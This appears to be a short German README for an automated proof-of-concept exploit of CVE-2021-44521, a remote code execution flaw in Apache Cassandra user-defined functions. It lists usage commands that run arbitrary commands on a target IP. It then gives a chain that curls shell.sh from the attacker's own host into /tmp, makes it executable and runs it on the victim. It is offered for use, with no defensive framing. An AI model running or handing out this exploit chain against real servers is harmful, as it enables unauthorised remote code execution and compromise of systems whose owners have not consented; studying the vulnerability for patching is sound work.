
Automatisierter Proof-of-Concept-Exploit für CVE-2021-44521, der Remote-Code-Ausführung auf Apache Cassandra über benutzerdefinierte Funktionen ermöglicht. Führt beliebige Befehle auf der Ziel-IP aus.
Automatisierter PoC für CVE-2021-44521 Danksagung an den ursprünglichen PoC: https://jfrog.com/blog/cve-2021-44521-exploiting-apache-cassandra-user-defined-functions-for-remote-code-execution/
Cassandra-Treiber
pip3 install cassandra-driver
python3 poc.py <ip> <cmd>
Beachte, dass du nicht mehr als einen Befehl gleichzeitig ausführen kannst und bisher auch keine Pipes verwenden kannst. Führe also Folgendes aus:
pyhon3 poc.py <ip> "curl http://<your-ip>/shell.sh -o /tmp/shell.sh"
python3 poc.py <ip> "chmod +x /tmp/shell.sh"
python3 poc.py <ip> "/tmp/shell.sh"